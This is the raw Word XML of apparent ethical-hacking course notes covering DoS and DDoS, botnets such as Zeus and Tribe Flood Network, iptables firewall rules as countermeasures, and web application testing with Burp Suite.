      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Commands that might have happened it background.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Can enable boot monitoring. Takes a dump of every process involved in the boot. This helps locate bootloader malware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**DoS &amp; DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dos attack goal is to deny service to a </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>particular</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resource. DDoS tries to get the same goal but by attacking from a botnet type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stockeldrought</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - German for barbed wire. One of the oldest DoS application. Has a master zombie that controls an army of zombie</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t xml:space="preserve"> bots ready to attack for DDoS. It u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00823EE2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>blowfish.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to encrypt messages between the attacker and the master server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DDoS requires a co-ordinated effort from zombies or botnet. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Directed</w:t>
      </w:r>
      <w:r w:rsidR="00823EE2">
        <w:t xml:space="preserve"> by a master host. It has a command &amp; c</w:t>
      </w:r>
      <w:r>
        <w:t>ontrol infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**DoS Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>packetstormsecurity.org</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">-- stores a lot of files for information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Sea</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t xml:space="preserve">rch for types of attack and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00754FF8">
        <w:t>PacketS</w:t>
      </w:r>
      <w:r>
        <w:t>torm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> could have the source code required to run the attack. Learn how the attack is written. A lot of the attacks don't work </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>anymore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but still very interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Cyber Crime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Criminals who are involved in this are using the same strategies and t</w:t>
      </w:r>
      <w:r w:rsidR="00E91532">
        <w:t xml:space="preserve">actics that this course covers. </w:t>
      </w:r>
      <w:r>
        <w:t>We need to study it because we need to know what the bad people ar</w:t>
      </w:r>
      <w:r w:rsidR="00E91532">
        <w:t xml:space="preserve">e doing so we can mitigate them. </w:t>
      </w:r>
      <w:r>
        <w:t>One of the reasons companies are hiring eth hack is because they're concerned with security posture.</w:t>
      </w:r>
      <w:r w:rsidR="00E91532">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00754FF8" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Cyber-crime</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>estimated t</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve">o cost upwards of $1 Trillion!! </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>Not only</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> from</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> businesses but also private people and especially government. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chinese Cyber division is estimated to be involved in espionage, theft of Intellectual Property, and hacking attacks. Cisco accused Huawei of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> Prop theft. </w:t>
      </w:r>
      <w:r>
        <w:t>Russia</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> are also allegedly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> involved in election meddling?</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We don't practice stringent security measures. Spending on security is seen as throwing money away, viewed as insurance. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Businesses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> don't see the value of it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anonymous - blur the lines between good/bad hackers. Hacktivism or </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Cyber-crime</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Botnets - zombies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A network of </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>compromised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hosts carrying out the wishes of a master. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Typically used in carrying out criminal activities or for spamming. Used to spread viruses and carry out DoS attacks especially. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Understanding the protections that might be in place to avoid an attack from a botnet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Grum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> botnet was used for spamming. World's biggest botnet spam network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Zeus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">is able to generate a piece of software that can be deployed to create a botnet. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tribe Flood Network</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>, TFN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - used on </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>compromised</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>UNIX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> systems on the internet. Used to implement DDoS</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> attacks such as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN flood, </w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve">ICMP flood, </w:t>
      </w:r>
      <w:r>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> flood</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Smurf attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tools were released in late 1990's, problem was quickly realised and in early 2000's some better techniques to stop botnets </w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> being created.</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> TFN2K was written but not sure if it is still up to date.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Attack counter-measures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Useful to know how to mitigate the attacks as you can tell your client. This is where your best value as a</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eth</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t>ical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hack</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t>er</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comes from. Tell them how to close them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRPr="00F20D17" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Rules to set on a Linux FW. Looks like a lot of rules that would be set by a stateless </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Firewall</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if not already on FW can easily be downloaded and applied. </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flush</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>-- flushes all current rules to start fresh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -P INPUT DROP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00F20D17" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -P OUTPUT DROP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -P FORWARD DROP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1 policy has 3 chains. Input, Output and Forward chains.</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A INPUT -S "192.168.1.0/24" -J accept</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Setting a rule for INPUT that anything from those source addresses would be accepted</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A OUTPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>icmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-type echo-request -j ACCEPT</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Setting a rule that any ICMP echo request (ping) going outwards is allowed through. Setting a rule by protocol.</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A INPUT -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>dport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 -m limit --limit25/minute --limit-burst 100 50 -j accept</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- sets a rate limit for the data and connections on anything to do with destination port 80.</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A -m state --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> INVALID -j DROP</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Sets a rule based on the state flow status.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>iptables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -A INPUT -s "42.42.42.42" -j LOG</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- Log anything to do with address 42.42.42.42</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>**Web Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t xml:space="preserve">pplication </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F20D17">
        <w:t>esting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is when you go to a website that has some interactive function with the user and you check the functionality and security of the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Normally would use the browser as part of your toolkit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8" w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>uite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is an intercepting proxy. </w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> application testing tool. Enables the browser to be configured to use it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vicnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Project</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - has some vulnerable web app that can be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Spider the website first to discover all of the pages associated with the website. Need this before finding all of the functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Next you would kick off a scan that will scan all o</w:t>
      </w:r>
      <w:r w:rsidR="00754FF8">
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the discovered pages and web application functions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The scan will highlight some possible vulnerabilities which you can investigate further to discover what exploits you could use. Also results will all need to be verified by running more precise scans than general website scan. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Web Application Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Very high level overview. 4 tier model. Servers could even all be virtual on 1 physical server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F20D17">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Presentation Layer</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>-- This will be done in the browser. Client side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
